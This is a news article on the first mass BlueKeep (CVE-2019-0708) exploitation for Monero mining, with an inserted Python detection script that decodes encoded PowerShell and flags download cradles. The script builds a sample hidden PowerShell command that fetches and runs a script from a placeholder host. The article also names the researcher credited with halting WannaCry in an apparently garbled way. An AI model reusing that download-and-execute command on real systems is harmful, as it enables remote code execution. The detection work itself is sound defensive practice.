Researchers recorded the first mass attempts to exploit an RCE vulnerability in Windows

Written by Valdis Koks

Cybersecurity experts have revealed the first mass attempts to exploit the widely publicized RCE vulnerability in Windows in order to mine cryptocurrency on vulnerable systems.

The vulnerability in question is CVE-2019-0708 (BlueKeep), for which Microsoft released a patch in May this year.

The flaw allows an attacker to execute arbitrary code and take control of the device by sending specially crafted requests to Remote Desktop Services; no user interaction is required. The bug affects Windows 2003, XP, Windows 7, Windows Server 2008 and 2008 R2 and poses a serious danger, because it can be used to carry out attacks like WannaCry and NotPetya. As of July 2, 2019, the number of systems affected by the BlueKeep vulnerability exceeded 805,000 devices.

The first attempts to exploit this vulnerability were recorded by researcher Kevin Beaumont on Saturday, November 2, when several of his honeypot systems suddenly crashed and rebooted.

“Huh, the EternalPot RDP honeypots have all started BSOD’ing recently. They only expose port 3389”, wrote Kevin Beaumont on Twitter.

After analyzing the data shared by Beaumont, information security expert Michael Hutchins, famous for temporarily halting the WannaCry epidemic in May 2017, confirmed that the bug was being exploited for Monero cryptocurrency mining.

“Kevin Beaumont kindly shared the crash dump with us and following this lead, we discovered the sample was being used in a mass exploitation attempt. Due to only smaller size kernel dumps being enabled, it is difficult to arrive at a definite root cause”, reported Michael Hutchins.

According to him, the exploit contains encrypted PowerShell commands that download the final malicious module from a remote server and execute it on the attacked system. According to the VirusTotal service, the attacks use malware that mines the Monero cryptocurrency.
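A defender's-side illustration of the payload stage described above, added here as an example and not taken from the article or from the analyzed sample: it triages process-creation command lines, decodes PowerShell's base64/UTF-16LE `-EncodedCommand` argument (an assumption about the obfuscation form, since the article does not say how the commands were encoded), and flags the download-and-execute behaviour the article describes. The sample command lines, the placeholder host and the indicator names are all constructed for the example.

```python
import base64
import binascii
import re

# PowerShell's -EncodedCommand switch and the abbreviations it accepts (-e, -ec, -enc, ...),
# followed by the base64 argument.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")

# Behaviours the article attributes to the payload: fetch a module from a remote
# server and execute it. Each pattern is named so that a verdict is explainable.
INDICATORS = {
    "download-cradle": re.compile(r"(?i)Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"),
    "in-memory-exec":  re.compile(r"(?i)Invoke-Expression|\bIEX\b"),
    "stealth-flags":   re.compile(r"(?i)-nop\b|-noni\b|-w(?:indowstyle)?\s+hidden"),
}

def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries an -EncodedCommand payload, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")  # PowerShell encodes the script as UTF-16LE
    except (binascii.Error, UnicodeDecodeError):
        return None

def triage(cmdline):
    """Classify one command line; 'hits' lists indicators matched in the line or its decoded script."""
    script = decode_encoded_command(cmdline)
    text = cmdline + "\n" + (script or "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return {"encoded": script is not None, "script": script, "hits": hits}

def build_sample():
    # Constructed stand-in for the technique described (not the real sample): a hidden
    # PowerShell that downloads and runs a script from a placeholder host.
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/m.ps1')"
    b64 = base64.b64encode(cradle.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -nop -w hidden -enc {b64}"

SAMPLE_COMMAND_LINES = [
    build_sample(),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",  # constructed benign line
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(triage(line))
```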


As the specialist noted, the malware has no ability to spread itself and cannot move from computer to computer. Apparently, the attackers first scan the Internet for vulnerable systems and then exploit them. There is currently no data on the number of systems compromised in the recent attacks.

“It is curious that this publicly known wormable vulnerability, known to everyone who would care to know for at least six months, took this long to get detectably weaponized. One might theorize that attackers know they have essentially one shot at using it at scale, and it becomes a game of chicken as to who will do it first”, wrote Michael Hutchins.

He also noted that mass exploitation of the vulnerability for profit could be difficult because of the associated risks, and that he had not seen a surge in random scanning of vulnerable ports like the one that accompanied the spread of EternalBlue across the Internet, now known as the WannaCry attack.

About the author

Valdis Koks

Security engineer, reverse engineering and memory forensics
